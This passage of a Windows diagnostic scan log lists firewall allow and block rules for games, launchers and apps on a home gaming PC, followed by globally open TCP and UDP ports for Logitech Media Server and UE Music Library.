FirewallRules: [{49966F41-9BFA-48F3-A63D-8FACAF2E5036}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Warhammer End Times Vermintide\launcher\launcher.exe
FirewallRules: [{2FC5A6BD-BF05-4164-89C1-16FE7BF2BAE1}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Warhammer End Times Vermintide\launcher\launcher.exe
FirewallRules: [{C2397ABC-794C-40AF-A15E-DA816A4EC318}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Rise of the Tomb Raider\ROTTR.exe
FirewallRules: [{B1052126-2905-42E2-956D-850CCD9C1014}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Rise of the Tomb Raider\ROTTR.exe
FirewallRules: [UDP Query User{0FF06ECA-E1F0-41B0-8FCD-126D174715D0}G:\program files (x86)\steam\steamapps\common\elite dangerous\products\elite-dangerous-64\elitedangerous64.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\elite dangerous\products\elite-dangerous-64\elitedangerous64.exe
FirewallRules: [TCP Query User{6928C914-94B4-4F89-99D1-4AA5BBD06AFC}G:\program files (x86)\steam\steamapps\common\elite dangerous\products\elite-dangerous-64\elitedangerous64.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\elite dangerous\products\elite-dangerous-64\elitedangerous64.exe
FirewallRules: [UDP Query User{98FBAFC3-976A-4164-813B-40F32032BBDF}G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe] => (Allow) G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe
FirewallRules: [TCP Query User{8030943B-531A-4F01-9F2A-FF946F4B1285}G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe] => (Allow) G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe
FirewallRules: [UDP Query User{54BD8357-54B2-4494-9854-D8EDB5EC5113}C:\users\*****\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\*****\appdata\roaming\spotify\spotify.exe
FirewallRules: [TCP Query User{BA245DA0-2241-46ED-8F5B-6B4A4A9FF1F7}C:\users\*****\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\*****\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{2B51C0D6-D4E8-4CC0-8271-F4A911C2F406}F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe] => (Allow) F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe
FirewallRules: [TCP Query User{437D4E9B-EC49-4CF6-8CD2-921830F6564C}F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe] => (Allow) F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe
FirewallRules: [{39430812-9852-49ED-9F86-904CB000274A}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Fallout 4\Fallout4Launcher.exe
FirewallRules: [{7376B877-0383-44F7-909E-07F9D738AFA7}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Fallout 4\Fallout4Launcher.exe
FirewallRules: [{22067E9A-32F2-40FF-AC7A-01F94C55642C}] => (Allow) G:\Games\World_of_Warships\WoWSLauncher.exe
FirewallRules: [{8D47AC7F-25CB-4C41-A7BA-EF713FCE93CF}] => (Allow) G:\Games\World_of_Warships\WoWSLauncher.exe
FirewallRules: [{A7EEE726-FE30-4C66-8AD5-93D5C3C96B07}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Elite Dangerous\EDLaunch.exe
FirewallRules: [{87C53834-94A0-4EEA-B4F5-6311177D9A07}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Elite Dangerous\EDLaunch.exe
FirewallRules: [{EA9F2049-950D-439D-85B9-02D649D73245}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Borderlands2.exe
FirewallRules: [{247328BE-4699-4A3F-A6CA-661592F926AF}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Borderlands2.exe
FirewallRules: [{DD07B558-9E11-4AAD-9B6D-7B75E3B4B53B}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Launcher.exe
FirewallRules: [{F4996C83-AA13-4703-B61B-4A89884F8B90}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Launcher.exe
FirewallRules: [{679B2599-B113-4728-B3FA-84E705F0BBDD}] => (Allow) G:\Program Files (x86)\Origin Games\Dragon Age Inquisition\DragonAgeInquisition.exe
FirewallRules: [{96341DDC-B74C-4FDE-A455-66A4B4835DF6}] => (Allow) G:\Program Files (x86)\Origin Games\Dragon Age Inquisition\DragonAgeInquisition.exe
FirewallRules: [{6818289E-239B-49EE-B001-FB69A2E6A8C0}] => (Allow) G:\Program Files (x86)\Funcom\The Secret World\ClientPatcher.exe
FirewallRules: [{F0859AC3-60E3-4D00-B630-170BF1C441E5}] => (Allow) G:\Program Files (x86)\Funcom\The Secret World\ClientPatcher.exe
FirewallRules: [{B515A77B-C22A-4D35-957F-4BC619063FF5}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Wolfenstein.The.New.Order.DE\WolfNewOrder_x64.exe
FirewallRules: [{42C09225-0BCA-4B7A-A912-874BA402CA17}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Wolfenstein.The.New.Order.DE\WolfNewOrder_x64.exe
FirewallRules: [{4F1029AB-0FBD-45F8-9898-689A2D6F9BAC}] => (Allow) G:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{679F21A3-8A59-45B3-8C1E-EFE5E0710C63}] => (Allow) G:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [TCP Query User{FB088684-BBC4-4D8B-BBAF-5842DA9EE196}C:\users\*****\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\*****\appdata\local\akamai\netsession_win.exe
FirewallRules: [UDP Query User{2A8CE33E-EC98-4518-B46D-42E1DEA51F46}C:\users\*****\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\*****\appdata\local\akamai\netsession_win.exe
FirewallRules: [{4D766A26-785C-455E-B90F-F910A14E7B7F}] => (Allow) C:\Users\*****\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [{451F15F9-2D6B-46B6-ACB5-710CD2226BDD}] => (Allow) C:\Users\*****\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [TCP Query User{37632275-71A2-49D8-A0FA-70CCB7875F1E}F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe] => (Allow) F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe
FirewallRules: [UDP Query User{2314FC4F-415A-4DF3-AA49-81CFB9ACE68A}F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe] => (Allow) F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe
FirewallRules: [TCP Query User{DA695000-4AF9-41AF-9754-C8FA4C6954C1}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{8D614418-EAB5-437D-8C47-BA5ACE131844}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [TCP Query User{A397AF39-676F-4717-8C88-59C336141F49}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{E5A7347B-77B2-483E-8FE8-4CAA8722A8D3}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [TCP Query User{7409D24F-3B4B-47E4-91B8-98CDC53334D0}C:\users\*****\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\*****\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [UDP Query User{4B5DB8A4-B9FF-49E3-A8CF-8F2DDDB8F35E}C:\users\*****\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\*****\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [{F723C80F-371B-4A95-8F54-FA07E9E42973}] => (Allow) G:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [{3059C505-B8D3-418B-AC08-C874D15FA7DE}] => (Allow) G:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [TCP Query User{3C48B5B3-18E3-4B84-A540-634DC83BA8B8}G:\program files (x86)\the elder scrolls online\launcher\bethesda.net_launcher.exe] => (Allow) G:\program files (x86)\the elder scrolls online\launcher\bethesda.net_launcher.exe
FirewallRules: [UDP Query User{B8D0287B-F1FE-4955-A6F8-D589CB7A01F5}G:\program files (x86)\the elder scrolls online\launcher\bethesda.net_launcher.exe] => (Allow) G:\program files (x86)\the elder scrolls online\launcher\bethesda.net_launcher.exe
FirewallRules: [{DB86E705-4890-40A5-853E-1F2EEC9DD046}] => (Allow) G:\Program Files (x86)\Origin Games\Dragon Age Inquisition\DragonAgeInquisition.exe
FirewallRules: [{C497194B-F1B8-4616-B08F-6951EFC5E468}] => (Allow) G:\Program Files (x86)\Origin Games\Dragon Age Inquisition\DragonAgeInquisition.exe
FirewallRules: [TCP Query User{410E0639-1031-468E-8C0C-9B488EDB7278}C:\users\*****\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\*****\appdata\local\akamai\netsession_win.exe
FirewallRules: [UDP Query User{0A39A2D1-3CAD-4DEE-BFD9-AD76B69202F7}C:\users\*****\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\*****\appdata\local\akamai\netsession_win.exe
FirewallRules: [{ABF58F19-4D87-4BE8-A373-55D7E1D64B7A}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{E9500049-D9E9-4E8B-A598-216A386F8B2C}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{6B35CD45-1CCB-44FE-8E73-3326D85DEF6B}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{81BFC3EA-16DF-4E60-B196-7E489C7383B7}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{81D600BE-5020-4F81-BFB0-4BF18DA2B05D}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFSP.exe
FirewallRules: [{6E5A5B32-5FA5-4BC2-A041-480153DF1E83}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFSP.exe
FirewallRules: [{6347001A-5F4B-4B99-BB7A-524AA41C0AD0}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFSP.exe
FirewallRules: [{56D9A896-9B47-43D5-98CA-538A542BD200}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFSP.exe
FirewallRules: [{D9FC3B0B-F50C-4BC2-BF3F-CDE2F2C9A290}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFMP.exe
FirewallRules: [{5A1C6FA4-8139-4243-B3B8-47B3EFB3EA53}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFMP.exe
FirewallRules: [{A213CF29-EB9C-4BFC-A988-0B1F4472789D}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFMP.exe
FirewallRules: [{D64B53D7-E8CD-40BD-9C91-72A20AD3970A}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFMP.exe
FirewallRules: [{F2578368-AA70-433E-B35A-5009C86D1E17}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{9F5E0788-335F-42C1-A22C-50F7D9CDC79D}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{32406C39-953C-460B-AFE6-CDE4B232D40D}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [TCP Query User{3EDA9F19-1F96-411E-8C1C-F563E58A3ADE}G:\games\world_of_warplanes\wowplauncher.exe] => (Allow) G:\games\world_of_warplanes\wowplauncher.exe
FirewallRules: [UDP Query User{68DEDDE0-6036-412F-AA44-08A74EE184D7}G:\games\world_of_warplanes\wowplauncher.exe] => (Allow) G:\games\world_of_warplanes\wowplauncher.exe
FirewallRules: [{AE314296-B5C7-4DF4-9374-D088F3A08615}] => (Block) G:\games\world_of_warplanes\wowplauncher.exe
FirewallRules: [{FDD2B1D2-8138-4DF1-B121-ED318FBA427B}] => (Block) G:\games\world_of_warplanes\wowplauncher.exe
FirewallRules: [{29D2BACC-43CD-4803-B503-59899E87FD68}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\mordheim\mordheim.exe
FirewallRules: [{FECFCD89-9DE5-49A3-B3A4-56AC70E40CD6}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\mordheim\mordheim.exe
FirewallRules: [TCP Query User{D8825ED6-64AE-45C5-B113-ECB7858A95CA}G:\program files\cloud imperium games\patcher\cigpatcher.exe] => (Allow) G:\program files\cloud imperium games\patcher\cigpatcher.exe
FirewallRules: [UDP Query User{7E395701-8E52-444C-8DA5-90B6FF036164}G:\program files\cloud imperium games\patcher\cigpatcher.exe] => (Allow) G:\program files\cloud imperium games\patcher\cigpatcher.exe
FirewallRules: [{413FDA69-6273-4C65-BB74-8CE72A1CF6C4}] => (Block) G:\program files\cloud imperium games\patcher\cigpatcher.exe
FirewallRules: [{9ADFBB2B-0B80-4A64-8FCB-571605B6D8A4}] => (Block) G:\program files\cloud imperium games\patcher\cigpatcher.exe
FirewallRules: [TCP Query User{A6D22F2F-32BB-4C44-8C74-EBDFE4627990}G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe] => (Allow) G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe
FirewallRules: [UDP Query User{E0FE8A20-C7CF-4897-B34B-C86C940403CA}G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe] => (Allow) G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe
FirewallRules: [{EBFEFE2F-A517-416E-AB96-B57AFAF058B1}] => (Block) G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe
FirewallRules: [{37DDA592-72D9-4843-B53B-828006F78A9A}] => (Block) G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe
FirewallRules: [{7E09FB06-AEB8-47CD-B06C-2F012CFD67D8}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Endless Space\EndlessSpace.exe
FirewallRules: [{44C7FB35-3400-4EEB-A7E0-CAABCFA9010D}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Endless Space\EndlessSpace.exe
FirewallRules: [{2E30090F-BF18-4888-8C31-BDFB251C40AA}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Terraria\Terraria.exe
FirewallRules: [{1E06EE93-F65D-4232-8C20-FF047C2960B3}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Terraria\Terraria.exe
FirewallRules: [{CB8A9966-C9BA-4D24-8DCF-82CCC446AD7E}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Elite Dangerous Horizons\EDLaunch.exe
FirewallRules: [{10D47C8E-1911-4379-B2A7-3DFAF5FECB49}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Elite Dangerous Horizons\EDLaunch.exe
FirewallRules: [TCP Query User{AE697FDF-95CB-4742-AFE1-175E002D0CDD}G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe] => (Allow) G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe
FirewallRules: [UDP Query User{21CEB7FC-0894-4127-82BF-6C74648C47A4}G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe] => (Allow) G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe
FirewallRules: [{922401B8-85D9-4FC4-B488-C575AD393F0E}] => (Allow) G:\Program Files (x86)\Origin Games\STAR WARS Battlefront\starwarsbattlefront.exe
FirewallRules: [{A0BED04D-77EC-44B5-A349-7E6248C82D08}] => (Allow) G:\Program Files (x86)\Origin Games\STAR WARS Battlefront\starwarsbattlefront.exe
FirewallRules: [TCP Query User{6D865778-4B1C-48E3-8EDE-88B07DE0E8CE}G:\program files (x86)\origin games\star wars battlefront\starwarsbattlefront.exe] => (Allow) G:\program files (x86)\origin games\star wars battlefront\starwarsbattlefront.exe
FirewallRules: [UDP Query User{13FFCB9B-2BE1-472F-96CE-29F783837766}G:\program files (x86)\origin games\star wars battlefront\starwarsbattlefront.exe] => (Allow) G:\program files (x86)\origin games\star wars battlefront\starwarsbattlefront.exe
FirewallRules: [{CB31CEEC-1545-42AA-9B71-7426B88BFB5E}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Galactic Civilizations III\GalCiv3.exe
FirewallRules: [{61419720-4278-4910-BFAC-E93AF187E7DF}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Galactic Civilizations III\GalCiv3.exe
FirewallRules: [TCP Query User{9A8EDE9E-029B-47AF-A061-7525FEE74527}G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe
FirewallRules: [UDP Query User{9F7A08A0-4DBC-40F2-89AC-5BA6AA0CD90F}G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe
FirewallRules: [TCP Query User{B00611DA-10FE-4A45-9987-D344F69AFE59}G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe] => (Allow) G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe
FirewallRules: [UDP Query User{3CE54E08-6C8E-4877-B238-A663ACEC403D}G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe] => (Allow) G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe
FirewallRules: [TCP Query User{02FD6615-749C-459B-9329-E9D3D840FD87}G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe] => (Allow) G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe
FirewallRules: [UDP Query User{0849F913-291A-4888-8D45-66C5704945BD}G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe] => (Allow) G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe
FirewallRules: [TCP Query User{6D5C88B3-7D5E-4872-82F0-A3CB31A96B85}C:\users\*****\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\*****\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{5CB68C43-4C63-438F-98EB-749826872FBE}C:\users\*****\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\*****\appdata\roaming\spotify\spotify.exe
FirewallRules: [{75747872-239D-4591-85C3-EC5A1D6EC796}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame_BE.exe
FirewallRules: [{A5A856A7-452C-421E-A65C-1EB4C29A172C}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame_BE.exe
FirewallRules: [{1508135B-998A-4813-8812-87AD3D57489A}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame.exe
FirewallRules: [{DA814E91-168A-465A-9266-00F76B832A69}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame.exe
FirewallRules: [{4C6E3958-1227-48B4-A938-C23D7B034480}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\No Man's Sky\Binaries\NMS.exe
FirewallRules: [{01193C79-C53E-4CB8-B7C2-5F0F8EC74B25}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\No Man's Sky\Binaries\NMS.exe
FirewallRules: [{F72D0DCF-6A2B-4F0C-BBA7-0C8DD6BCC27F}] => (Allow) G:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Rayman Origins\gu.exe
FirewallRules: [{A93DA08B-800F-4E4E-8BBB-368C93F6080A}] => (Allow) G:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Rayman Origins\gu.exe
FirewallRules: [{D3231BE9-FB26-4B52-A06F-C76F95C54121}] => (Allow) G:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Rayman Origins\Rayman Origins.exe
FirewallRules: [{C17DA570-D7C5-4124-A736-398D9CEBB379}] => (Allow) G:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Rayman Origins\Rayman Origins.exe
FirewallRules: [{F87F2FB5-8593-4BFD-B2A9-A08FA335DB4D}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Master of Orion\MasterOfOrion.exe
FirewallRules: [{DD2FEDAC-B152-4BA8-A685-87BB03D81555}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Master of Orion\MasterOfOrion.exe
FirewallRules: [{DC75C909-CEA5-498F-B98D-A5FA3673F55B}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Total War WARHAMMER\launcher\launcher.exe
FirewallRules: [{67EB36C9-7978-4E8B-B4E2-D789597F76F7}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Total War WARHAMMER\launcher\launcher.exe
FirewallRules: [TCP Query User{1B9BBC75-D6A3-451D-9402-7BF428C6B964}G:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) G:\program files (x86)\hearthstone\hearthstone.exe
FirewallRules: [UDP Query User{9F8F6E86-D511-4F2C-892D-703134694F63}G:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) G:\program files (x86)\hearthstone\hearthstone.exe
FirewallRules: [{8AF18EE4-FBC6-4D0A-BC4E-D3F149CDB2A9}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Tom Clancy's The Division\thedivision.exe
FirewallRules: [{87EB15D3-94CF-4471-A526-5B82C235CB03}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Tom Clancy's The Division\thedivision.exe
FirewallRules: [{CA69E6B0-A279-4343-AF7A-0AF44A42D8DA}] => (Block) LPort=445
FirewallRules: [{E924BE7C-390D-4029-AF9F-F7E5005B87A0}] => (Block) LPort=445
FirewallRules: [{B3BD5C1D-80FD-4A00-BF14-9B9B1B4C9F15}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Dawn of War III\RelicDoW3.exe
FirewallRules: [{38D2290F-C6D2-4166-A44D-3ECDEEA6A2AF}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Dawn of War III\RelicDoW3.exe
FirewallRules: [TCP Query User{50D16B60-67AB-488A-AE5C-E61D97824CA9}G:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) G:\program files (x86)\hearthstone\hearthstone.exe
FirewallRules: [UDP Query User{19EF7346-06B2-43ED-8F39-A83414013D6C}G:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) G:\program files (x86)\hearthstone\hearthstone.exe
FirewallRules: [{6DB5B824-C375-4374-B640-5A46AE0D856B}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.x64.exe
FirewallRules: [{2F010EF3-6120-4A95-B9C0-5CD981CCF542}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.x64.exe
FirewallRules: [{09CB81DB-7550-4F7B-B023-18A4A3920F6B}] => (Allow) C:\Users\*****\AppData\Local\Warframe\Downloaded\Public\Tools\Launcher.exe
FirewallRules: [{692B4130-23BF-4C1F-96BC-5039D5E48ED4}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Tools\RemoteCrashSender.exe
FirewallRules: [{C0A906DA-FAB3-4A93-97C7-F59B870BDFA1}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.x64.exe
FirewallRules: [{BF2178FB-4544-451B-9B32-D5A4C31F4FCA}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.x64.exe
FirewallRules: [{F37A5F7E-D189-4815-A302-2891EAFA783C}] => (Allow) C:\Users\*****\AppData\Local\Warframe\Downloaded\Public\Tools\Launcher.exe
FirewallRules: [{7C735814-90CD-4F3A-A051-211C0BBD9495}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Tools\RemoteCrashSender.exe
FirewallRules: [{DAC4BDBD-6873-4C9D-A3D9-1CF7A9DBD691}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\TheLongDark\tld.exe
FirewallRules: [{D08800A7-21B0-4FDF-93DC-9BBF11F5F80E}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\TheLongDark\tld.exe
FirewallRules: [{607765EA-BFDC-4528-857D-9DB7207FA061}] => (Allow) G:\Program Files (x86)\Origin Games\SimCity\SimCity\SimCity.exe
FirewallRules: [{9C65B7A2-4B3D-4E1D-98A3-4C2662F366C7}] => (Allow) G:\Program Files (x86)\Origin Games\SimCity\SimCity\SimCity.exe
FirewallRules: [{FEA59EF6-632E-4765-9BA8-17DBA601260E}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Total War WARHAMMER\launcher\launcher.exe
FirewallRules: [{5B99B3A8-F2E7-4326-BBDD-FC046CAA57D7}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Total War WARHAMMER\launcher\launcher.exe
FirewallRules: [{6AB67BB1-CE72-42C7-B1A7-686993AA20AC}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{AFFDAA2A-A01E-4601-9977-4EC518739200}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{064DE8B2-CDAB-4E65-AA20-4F44B1C38564}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{F30A19A3-5234-4E0D-8B86-B393932138B4}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{EA33863E-67CD-4843-A527-7077DE793E0E}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{ED9892D6-6D9D-426F-97C9-38483F4C7806}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{C6E60452-31A4-49DE-8FC4-6093529938F3}] => (Allow) C:\Program Files (x86)\MyDrive Connect\TomTom MyDrive Connect.exe
FirewallRules: [{E76100CD-DE19-44E3-957C-3D5E4FCCDCC3}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
DomainProfile\GloballyOpenPorts: [9000:TCP] => Enabled:Logitech Media Server 9000 tcp (UI)
DomainProfile\GloballyOpenPorts: [9001:TCP] => Enabled:UE Music Library 9001 tcp (UI)
DomainProfile\GloballyOpenPorts: [9002:TCP] => Enabled:UE Music Library 9002 tcp (UI)
DomainProfile\GloballyOpenPorts: [9003:TCP] => Enabled:UE Music Library 9003 tcp (UI)
DomainProfile\GloballyOpenPorts: [9004:TCP] => Enabled:UE Music Library 9004 tcp (UI)
DomainProfile\GloballyOpenPorts: [9005:TCP] => Enabled:UE Music Library 9005 tcp (UI)
DomainProfile\GloballyOpenPorts: [9006:TCP] => Enabled:UE Music Library 9006 tcp (UI)
DomainProfile\GloballyOpenPorts: [9007:TCP] => Enabled:UE Music Library 9007 tcp (UI)
DomainProfile\GloballyOpenPorts: [9008:TCP] => Enabled:UE Music Library 9008 tcp (UI)
DomainProfile\GloballyOpenPorts: [9009:TCP] => Enabled:UE Music Library 9009 tcp (UI)
DomainProfile\GloballyOpenPorts: [9010:TCP] => Enabled:UE Music Library 9010 tcp (UI)
DomainProfile\GloballyOpenPorts: [9100:TCP] => Enabled:UE Music Library 9100 tcp (UI)
DomainProfile\GloballyOpenPorts: [8000:TCP] => Enabled:UE Music Library 8000 tcp (UI)
DomainProfile\GloballyOpenPorts: [10000:TCP] => Enabled:UE Music Library 10000 tcp (UI)
DomainProfile\GloballyOpenPorts: [9090:TCP] => Enabled:UE Music Library 9090 tcp (UI)
DomainProfile\GloballyOpenPorts: [3483:UDP] => Enabled:UE Music Library 3483 udp
DomainProfile\GloballyOpenPorts: [3483:TCP] => Enabled:UE Music Library 3483 tcp
DomainProfile\GloballyOpenPorts: [3546:TCP] => 3483:TCP:*:Enabled:UE Music Library 3483 tcp
DomainProfile\GloballyOpenPorts: [3546:UDP] => 3483:UDP:*:Enabled:UE Music Library 3483 udp
StandardProfile\GloballyOpenPorts: [9000:TCP] => Enabled:Logitech Media Server 9000 tcp (UI)
StandardProfile\GloballyOpenPorts: [9001:TCP] => Enabled:UE Music Library 9001 tcp (UI)
StandardProfile\GloballyOpenPorts: [9002:TCP] => Enabled:UE Music Library 9002 tcp (UI)
StandardProfile\GloballyOpenPorts: [9003:TCP] => Enabled:UE Music Library 9003 tcp (UI)
StandardProfile\GloballyOpenPorts: [9004:TCP] => Enabled:UE Music Library 9004 tcp (UI)
StandardProfile\GloballyOpenPorts: [9005:TCP] => Enabled:UE Music Library 9005 tcp (UI)
StandardProfile\GloballyOpenPorts: [9006:TCP] => Enabled:UE Music Library 9006 tcp (UI)
StandardProfile\GloballyOpenPorts: [9007:TCP] => Enabled:UE Music Library 9007 tcp (UI)
StandardProfile\GloballyOpenPorts: [9008:TCP] => Enabled:UE Music Library 9008 tcp (UI)
StandardProfile\GloballyOpenPorts: [9009:TCP] => Enabled:UE Music Library 9009 tcp (UI)
